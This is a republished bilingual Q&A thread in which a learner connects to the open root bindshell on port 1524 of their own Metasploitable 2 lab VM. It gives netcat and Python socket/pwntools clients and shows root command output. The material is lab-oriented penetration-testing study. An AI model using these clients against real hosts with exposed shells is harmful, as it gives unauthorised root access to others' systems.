如何通过开放外壳端口使用python套接字访问Metasploitable 2 VM外壳?
[英]How can I access Metasploitable 2 VM shell with python socket through open shell port?
问题描述
I just trying to learn penetration test tools like nmap, netcat etc. now and I'm testing this tools on my Metasploitable 2 VM.When I scanned my Metasploitable machine's port, I saw there is Metasploitable root shell(1524) open port: 
我只是想立即学习诸如nmap,netcat等的渗透测试工具,并且正在我的Metasploitable 2 VM上测试该工具。当我扫描Metasploitable机器的端口时,我看到有Metasploitable根shell(1524)开放端口:
1524/tcp open shell Metasploitable root shell 1524 / tcp open shell可配置的根shell
When I connect to port 1524 with simple netcat tcp connection, I accessed my Metasploitable 2 VM's shell immediately: 当我通过简单的netcat tcp连接连接到端口1524时,我立即访问了Metasploitable 2 VM的外壳:
root@kali:~# netcat 10.0.2.4 1524 root @ kali:〜#netcat 10.0.2.4 1524
root@metasploitable:/# root @ metasploitable:/#
It was very easy even for me and I thought I can connect to the my Metasploitable 2 VM via python socket but, it was not as easy as I thought. 即使对我来说,这也非常容易,我以为我可以通过python套接字连接到我的Metasploitable 2 VM,但这并不像我想的那么容易。
import sys
import socket
import subprocess
host = '10.0.2.4' # Metasploitable 2 VM's IP
port = 1524 # Metasploitable root shell
sock = socket.socket()
try:
sock.connect((host, port))
except Exception as err:
print(err)
while True:
data = sock.recv(1024)
cmd = input('root@nonkali:#> ')
if cmd == 'quit':
sock.close()
sys.exit()
if cmd:
command = subprocess.Popen(data.decode('utf-8'), shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
outs = command.stdout.read() + command.stderr.read()
str_outs = str(outs, 'utf-8')
sock.send(cmd.encode())
print(str_outs)
sock.close()
Output: 输出:
root@nonkali:#> ls
/bin/sh: 1: root@metasploitable:/#: not found
ls
ls
^CTraceback (most recent call last):
File "Python/tcp_client.py", line 15, in <module>
data = sock.recv(4096)
KeyboardInterrupt
I tried some bunch of codes like this but I never access my VM's shell. 我尝试了一些类似这样的代码,但从未访问过VM的外壳。 I still don't know what am I doing wrong.I need a bit help.Actually, I want to understanding difference between netcat 10.0.2.4 1524 and python socket connection. 我仍然不知道我在做什么错,我需要一点帮助。实际上,我想了解netcat 10.0.2.4 1524和python套接字连接之间的区别。
2 个解决方案
解决方案1
1 2018-01-31 09:31:40
I'll provide two ways of doing it, that both worked for me. 我将提供两种方法,这两种方法都对我有用。 I tried the following on ubuntu 17.10 (with python 2.7.14 ). 我在ubuntu 17.10 (使用python 2.7.14 )上尝试了以下方法。 The first one is using sockets and establishing a TCP connection . 第一个是使用套接字并建立TCP连接 。 The code snippet is the following: 代码段如下:
#!/usr/bin/env python
import sys
from socket import *
def nc(host, port):
s = socket(AF_INET, SOCK_STREAM) # TCP client
s.connect((host, port))
try:
while 1:
mydata = raw_input("root@root:#> ")
if mydata.strip()!='':
s.sendall(str(mydata))
data = s.recv(1024)
print data
except KeyboardInterrupt:
s.close()
sys.exit(0)
if __name__ == '__main__':
host = '...'
port = 11111
nc(host, port)
This gave me the following output: 这给了我以下输出:
$ ./test.py
root@root:#> ls
file1
testfile.zip
testfile3
root@root:#> whoami
testuser
root@root:#>
The other way as I said in the comments is by using pwntools . 我在评论中说的另一种方法是使用pwntools 。 The script is the following: 脚本如下:
from pwn import *
p = remote(host,port)
p.interactive()
This will work also. 这也将起作用。 The main difference between the two scripts is that the first script is a native python socket-based implementation (use standard libraries only) while the other way even if its easier depends on pwntools framework and doesn't mess with low-level socket programing. 这两个脚本之间的主要区别在于,第一个脚本是基于python套接字的本地实现(仅使用标准库),而另一种脚本,即使它更容易使用,也取决于pwntools框架,并且不会与低级套接字编程pwntools 。 Actually both scripts are nothing more than just a simple TCP-client implementation. 实际上,这两个脚本仅不过是一个简单的TCP客户端实现。
解决方案2
1 已采纳 2018-01-31 13:52:10
I guess,I found my problem: Threading! 我猜,我发现了我的问题: 线程! I don't know exactly how works threading but,I implemented threading module to my code and It works well now. 我不确切知道线程的工作方式,但是,我在代码中实现了线程模块,并且现在工作良好。
#!/usr/bin/python3.6
import sys
import socket
import threading
def tcp_connect(host, port):
global sock
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((host, port))
interact()
except Exception as err:
print(err)
sys.exit()
def recv():
while True:
try:
data = sock.recv(1024)
sys.stdout.write(data.decode('utf-8'))
sys.stdout.flush()
except Exception as err:
print(err)
sock.close()
sys.exit()
def interact():
th = threading.Thread(target=recv)
th.start()
try:
while True:
cmd = sys.stdin.read(1)
sock.send(cmd.encode())
print('Connection closed.')
sock.close()
sys.exit()
except KeyboardInterrupt:
sock.close()
sys.exit()
if __name__ == '__main__':
host = '10.0.2.4'
port = 1524
tcp_connect(host, port)
And my commands are working: 我的命令正在工作:
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.